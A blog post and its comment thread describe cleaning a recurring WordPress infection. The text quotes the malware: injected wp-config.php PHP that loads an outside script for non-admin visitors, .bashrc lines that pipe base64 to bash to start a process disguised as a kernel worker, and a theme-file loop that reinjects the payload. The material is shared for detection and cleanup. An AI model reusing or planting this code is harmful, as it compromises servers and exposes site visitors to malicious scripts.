On my WordPress site, virus code was added to the wp-config.php file with base64 at certain intervals.
Despite searching the site files and database (especially the wp-options table), I could not find the source of the virus.
The Wordfence: WordPress Security Plugin could not find this virus either.
After struggling for a long time, I was able to find where the virus was.
Virus code added to wp-config.php file:
<?php ini_set("display_errors",0); ini_set("display_startup_errors",0);
if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false
&& strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false
&& strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php")
=== false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) {
print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?>
<script src="//sync.gsyndication.com/"></script>/home/Your Username/.bashrc file content:
# .bashrc
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
{ echo L2Jpbi9wa2lsbCAtMCAtVTEwMDcgZGVmdW5jdCAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9Zb3VyIFVzZXJuYW1lLy5jb25maWcvaHRvcC9kZWZ1bmN0LmRhdCAtbGlxRCIgZXhlYyAtYSAnW2tzd2FwZDBdJyAnL2hvbWUvWW91ciBVc2VybmFtZS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwp|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functionsThe base64 code in the file above adds virus codes to the /home/Your Username/.config/htop/defunct.dat and /home/Your Username/.config/htop/defunct files.
I solved this problem by cleaning these files, I hope it will be useful for you too.
Alternative / Workaround
If you can’t find the source of the virus, there is a temporary solution that can save your site.
- Open your wp-config.php file.
- Close the virus code by adding /* at the beginning and */ at the end. (It should be like below)
- The virus code will remain but will no longer be functional.
- And here’s the good news, the infected code will not be reintroduced.
<?php /* ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } */?>Why don’t people comment and say thank you?
I found this exact thing in my wp-config.php file, minus . But the reason I found your site is because I did a search on //sync.gsyndication.com/ due to seeing before when I viewed page source on the site I’m trying to fix (it’s redirecting to sketchy websites sometimes).
I logged into the WordPress site with SSH and have a home folder for my user, but I don’t have a .bashrc file (or a .config folder). Is there anything else I should look for?
The other issue with WordPress is that Jetpack isn’t connected and there is no way to connect it. It acts like it’s connected and working, but I can’t access any pages or anything because it says Jetpack isn’t connected. The WordPress site is super messed up right now.
.bashrc file is available in Centos Web Panels. You are probably using Cpanel and it may have leaked to another file.
You can use Alternative solution until you find the source of the problem.
I did not understand what you want to do in Jetpack plugin, please give more detailed information.
I’m new to WordPress, and I’m doing this for a friend. Apparently she has business plan which includes domains and hosting, and forced usage of Jetpack, so I can’t disable it or anything, and it’s connected, yet not connected; I don’t understand what’s happening and I can’t access any pages from the dashboard because it says Jetpack is not connected (that I’m not connected to the site). So I have to SSH in (can enable SSH from the Server Settings page, and can also access phpMyAdmin from the Server Settings page as well). It’s all hosted by WordPress (and in the wp-config.php it says that “Database connection information automatically provided by Pressable.”).
So I also was scouring the database, and in the wp_options table, I found under the option_name, wpw_auto_poster_wordpress_mapped_posttypes, the option_value:
a:22:{s:4:”post”;a:4:{i:0;s:8:”facebook”;i:1;s:7:”twitter”;i:2;s:8:”linkedin”;i:3;s:90:”onetwo\”>\\”;}s:4:”page”;s:0:””;s:10:”attachment”;s:0:””;s:14:”e-landing-page”;s:0:””;s:17:”elementor_library”;s:0:””;s:7:”product”;s:0:””;s:12:”sfwd-courses”;s:0:””;s:12:”sfwd-lessons”;s:0:””;s:10:”sfwd-topic”;s:0:””;s:9:”sfwd-quiz”;s:0:””;s:7:”ld-exam”;s:0:””;s:17:”sfwd-certificates”;s:0:””;s:6:”groups”;s:0:””;s:17:”sfwd-transactions”;s:0:””;s:12:”guest-author”;s:0:””;s:15:”magee_portfolio”;s:0:””;s:13:”mailpoet_page”;s:0:””;s:11:”sfwd-essays”;s:0:””;s:15:”sfwd-assignment”;s:0:””;s:19:”woowgallery-dynamic”;s:0:””;s:11:”testimonial”;s:0:””;s:9:”pdfviewer”;s:0:””;}
looks kind of suspicious to me, so I removed that (I backed up the value first, though). While it has no negative effects, I *still* can’t get the redirection to stop.
The redirection always starts with cloudcdnstaticDOTcom then citadoresDOTcom then a sketchy website of choice.
The code starting with “a:22:{s:4:”post”;a:4:” is not a virus.
AHA. That’s because your blog comments are removing the script portion automatically. I tried to post it again and noticed it was gone. Let’s see if this works:
Your blog is automatically removing it, probably because they’re the script tags. I’m going to modify it by removing the greater/lesser than signs:
script src=https://aka.cloudsyndication.dev/ /script
If this shows up for you, that’s what was in the value.
Yes, this is a virus code.
Do you believe that:
script src=https://aka.cloudsyndication.dev/ /script
in the database is the source of the virus? At least in my case? I guess I’m trying to determine if everything is cleaned up. WordPress isn’t getting back to me (I can’t wait to have my friend move away from their hosting services), and I don’t know if they cleared the cache or what because the site no longer redirects or has the malicious code in the head. This happened sometime after I contacted them. I was thinking that I should do a restore to an earlier point because I don’t want my friend’s developers to move all the files to another host when some of them could be malicious. But I can’t control the restore; only WordPress can do that. They said they did a scan and didn’t find anything malicious, and that’s about all I could get from them.
Yes, this is virus code and it opens a popup on the site for every user who is not logged in as admin. (It is not shown for those who are logged in as admin most of the time.)
I also want to note that I did do the workaround originally (commented out the code as you suggested), but it didn’t stop the redirections.
Disregard the stuff about Jetpack. It was unrelated. What happened was someone else had installed Defender, which blocked access to xmlrpc.php so that Jetpack could no longer access the site. So after I fixed that, I could access the pages from the GUI, and I don’t see any malicious code from there.
Anyways, I cannot, for the life of me, get this redirect hack figured out.
There may be more than one virus on the site, try a full scan with the Wordfence plugin.
Because my friend is using WordPress hosting services (business plan), they won’t allow installation of Wordfence. I tried anyway by attempting to install the zip, but it won’t activate.
Thanks for the article,
I cleaned the .bashrc file, but still, code is appearing again and again in wp-config 🙂
Now im going to try workaraund with /* */
You’re welcome, the temporary solution works. If you find a permanent solution, please let us know so everyone can benefit.
I found the source of the problem for me. It was a malicious plugin called “Ultra SEO Processor”. See the code for the plugin here: https://pastebin.com/vDqfqYNL
You can see it in line 222. The plugin folder was called `ultra-seo-processor` and only one file within it, `ultra-seo-processor.php` which contained the code. The plugin page was https://wordpress.com/plugins/ultra-seo-processor but it no longer exists. Another admin on the site had installed it on December 30.
This is not a plugin anyway. They create a similar plugin file and add code, so this is not the real source of the problem.
Most of your files in the main directory are probably infected with code.
Be sure to scan with the Wordfence plugin, you will see that many virus codes are infected.
I was speaking with someone else about the issue, and this person believes that “UpdraftPlus: WP Backup & Migration” plugin is what caused the breach which allowed someone to take over one of the admin accounts and install the “Ultra SEO Processor” fake plugin.
https://www.searchenginejournal.com/wordpress-backup-plugin-vulnerability-affects-3-million-sites/536693/
Furthermore, I cannot scan with Wordfence because I am unable to install Wordfence. It is all hosted by WordPress, which forces the use of Jetpack, and Jetpack won’t allow Wordfence install. I tried anyway, and it simply won’t happen.
I ended up doing a restore to the point before “Ultra SEO Processor” was installed.
Hi,
I’m fighting with the same virus.
I have found the file .bashrc.
What piece of code do I have to delete please ? I’m not a developper 🙁
Here is my code
# .bashrc
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMTkxIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvdGF4aXljYXkvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdba3dvcmtlcl0nICcvaG9tZS90YXhpeWNheS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwpCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don’t like systemctl’s auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
The base64 code starting with L3Vzci9iaW4vcGtpbGwg is a virus, I wrote the original file codes in your other comment, replace it with it. Also scan with Wordfence, it will allow you to fix the infected areas.
I think I have found.
Do you confirm ?
{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMTkxIGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvdGF4aXljYXkvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdba3dvcmtlcl0nICcvaG9tZS90YXhpeWNheS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwpCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel
The original .bashrc file codes are as follows.
# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# Uncomment the following line if you don’t like systemctl’s auto-paging feature:
# export SYSTEMD_PAGER=
# User specific aliases and functions
Thanks to you my website is clean \o/
I have asked my hosting how to protect this file ? He answers to me that I can delete it 🙂
That’s what i did 🙂
Thank you so much.
Nice. By the way I found this piece of code in several 404 and hidden-404 php pages of different themes :
$cdn = ”;
foreach ($directories as $directory) {
$index_path = $directory . ‘/wp-config.php’;
if (file_exists($index_path) && is_writable($index_path)) {
$index_content = file_get_contents($index_path);
if (substr(trim($index_content), -2) !== “?>”) {
$index_content .= ”
?>”;
}
if (strpos($index_content, ‘PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+’) === false) {
$index_content .= ”
” . $cdn;
}
file_put_contents($index_path, $index_content);
} else {
error_log(“File not found or not writable: $index_path”);
}
}